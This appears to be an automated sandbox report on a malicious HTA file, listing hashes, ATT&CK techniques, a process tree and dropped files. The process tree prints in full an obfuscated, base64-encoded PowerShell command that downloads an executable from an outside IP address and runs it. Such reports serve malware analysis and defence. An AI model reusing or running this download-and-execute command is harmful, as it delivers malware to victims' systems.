4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4

General

Target

niceidea.hta
Size

154KB
MD5

586dc2855cbce16da2db1a5840694321
SHA1

aa92aefd6a9f95dc8e38f4d3b406cf506df9335b
SHA256

4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4
SHA512

53685b59faf9cff6d5cc4d07d7cda09e384a412ce79c5fb11fd48d815005cc60bf56d944a0fde3c1c274e5565f2ff4385db6e2fa1461a3e7b8f0e446d4558779
SSDEEP

96:4owZw9d6yfaKPQEoXRUn+VO+ehLGOToQPU6ghhiXB3zn+/edxCUMIqh2SCw2QKSs:4LwSiolYyrk3DwQ

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow	pid	Process
3	2652	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

Processes:

powershell.exe

pid	Process
2652	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.execmd.exepowershell.execsc.execvtres.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid	Process
2652	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	2652	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

mshta.execmd.exepowershell.execsc.exe

description	pid	Process	procid_target
PID 1320 wrote to memory of 2800	1320	mshta.exe	30
PID 1320 wrote to memory of 2800	1320	mshta.exe	30
PID 1320 wrote to memory of 2800	1320	mshta.exe	30
PID 1320 wrote to memory of 2800	1320	mshta.exe	30
PID 2800 wrote to memory of 2652	2800	cmd.exe	32
PID 2800 wrote to memory of 2652	2800	cmd.exe	32
PID 2800 wrote to memory of 2652	2800	cmd.exe	32
PID 2800 wrote to memory of 2652	2800	cmd.exe	32
PID 2652 wrote to memory of 2760	2652	powershell.exe	33
PID 2652 wrote to memory of 2760	2652	powershell.exe	33
PID 2652 wrote to memory of 2760	2652	powershell.exe	33
PID 2652 wrote to memory of 2760	2652	powershell.exe	33
PID 2760 wrote to memory of 884	2760	csc.exe	34
PID 2760 wrote to memory of 884	2760	csc.exe	34
PID 2760 wrote to memory of 884	2760	csc.exe	34
PID 2760 wrote to memory of 884	2760	csc.exe	34

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\niceidea.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1320
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PoWeRSHeLl -EX BYPAsS -Nop -w 1 -c DEviCECReDeNTIAlDepLOymEnt ; iNvOKe-EXPrESSIOn($(inVOkE-ExpREsSION('[SYSTeM.teXT.eNCoDIng]'+[ChaR]58+[chaR]58+'uTf8.GeTstRing([systEm.CoNVert]'+[chAR]0X3a+[cHAR]0X3a+'fRomBAse64sTrInG('+[CHar]34+'JGtHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJFcmRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEV2Y3FORkllTVpRLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd3WkJZc25ULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR096R3NXcnhhLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNTlBBc0dxV3YpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhJdXFrUkJ1UE1aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpDdWpLTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrRzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjk1LjE5Ny80MjEvdW5jLmV4ZSIsIiRlblY6QVBQREFUQVx1bmMuZXhlIiwwLDApO1N0YVJULVNsZUVwKDMpO2lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdW5jLmV4ZSI='+[cHaR]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWeRSHeLl -EX BYPAsS -Nop -w 1 -c DEviCECReDeNTIAlDepLOymEnt ; iNvOKe-EXPrESSIOn($(inVOkE-ExpREsSION('[SYSTeM.teXT.eNCoDIng]'+[ChaR]58+[chaR]58+'uTf8.GeTstRing([systEm.CoNVert]'+[chAR]0X3a+[cHAR]0X3a+'fRomBAse64sTrInG('+[CHar]34+'JGtHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJFcmRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEV2Y3FORkllTVpRLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd3WkJZc25ULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR096R3NXcnhhLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNTlBBc0dxV3YpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhJdXFrUkJ1UE1aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpDdWpLTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrRzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjk1LjE5Ny80MjEvdW5jLmV4ZSIsIiRlblY6QVBQREFUQVx1bmMuZXhlIiwwLDApO1N0YVJULVNsZUVwKDMpO2lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdW5jLmV4ZSI='+[cHaR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0gt5ukeq.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2760
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES214.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC213.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0gt5ukeq.dll

Filesize
3KB

MD5
0ffcb85a1a59271aceabf0eb0fec92da

SHA1
552549202f38ed2ba31253d78d52ca919ecf7f65

SHA256
6068d8f080e36c3d9adf04e985121db2edd35cea72f5a2468c0f450ce4a3c575

SHA512
8f187ada2547298dc25405264bcbe5dc7a7bcb011568ca7d03aa959706741a029485a5a709dd9d02296da9e83d519511df249a1a27a68f296a9d64e5f6f9f348

Download Submit
C:\Users\Admin\AppData\Local\Temp\0gt5ukeq.pdb

Filesize
7KB

MD5
f5d395465196f8fa303414526a28d093

SHA1
94b08fd1f8dc6c5d71b80cf637f12a5da73b6978

SHA256
09567f1b66677652f843502f957d5981b6fa8e79c7792e4e318765b3f8b3f38b

SHA512
803953bd3e14c597a14eb43eb384862453a4076523414a982212b3cb04515b782e5546de65af3ab97bad3e4c79cda5c3a769d81058f47eb90e2712bb3d7259e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES214.tmp

Filesize
1KB

MD5
7da664c48f785c0a178cc4349c41dd88

SHA1
321fda86a5a644c352e3e8ca5e9467ffd7c9c336

SHA256
07dbb23aa565656dfd998b0a39bca48c01ece64598b0d643376506879c006eeb

SHA512
7eeff8c52bd9c07d993e74f4db7ce89d1b0f111bb746b4772d90ff04f2b3c0d46e4e0ee95e7d40cf2fade35c15404438d576d321d001b31554e6f18b6364450b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0gt5ukeq.0.cs

Filesize
482B

MD5
fb855dde451137351eb67570a43b18f5

SHA1
3e66d1786f6644d488d7b8a97a3f429518199f5e

SHA256
ff934921644479cabd71a146f687a208c7924197a310f2bdd86fcea1dcb3570f

SHA512
40bd0be759b332b735af39b6c82e24d6b093cbca1d5bde975078cbd28ce0d2e3f8c03c0559a42b7f68d482487b3157719d963428359245aef11db4823a6691cf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0gt5ukeq.cmdline

Filesize
309B

MD5
5b37161ce6f0f1113c3781a21b88581d

SHA1
4dd4f8ba8cd73a9d89527483d468cef8bf90cd51

SHA256
a8df2d5e6b8fbaf3a66160a22f548d6a1e28ae0cadd96afa2aac650f04952b21

SHA512
1265a3c42219de47e747ca4ddb088ac530910849d7f9f0dd446425ca9aeb9204a42d9c0f5f760bb74f07a41950450dfaff57883e799d3ece21cbdd783337b569

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC213.tmp

Filesize
652B

MD5
232e1e54d4f1cff6b5acb6122ae17833

SHA1
9682293600f39b7d5988f1e147c3919607aebf09

SHA256
8688220fbcf9e6e94813c1773ba8585ce80840ce81669f7ddc6c298823c3ce69

SHA512
fe2aabbbbee345b64c4945c259ba1ec8289ca9be4185119ac731d4f23db044407818670b11f7d27e8d05ec5d28370043af9c0baffc1794d2697585940152f1c7

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads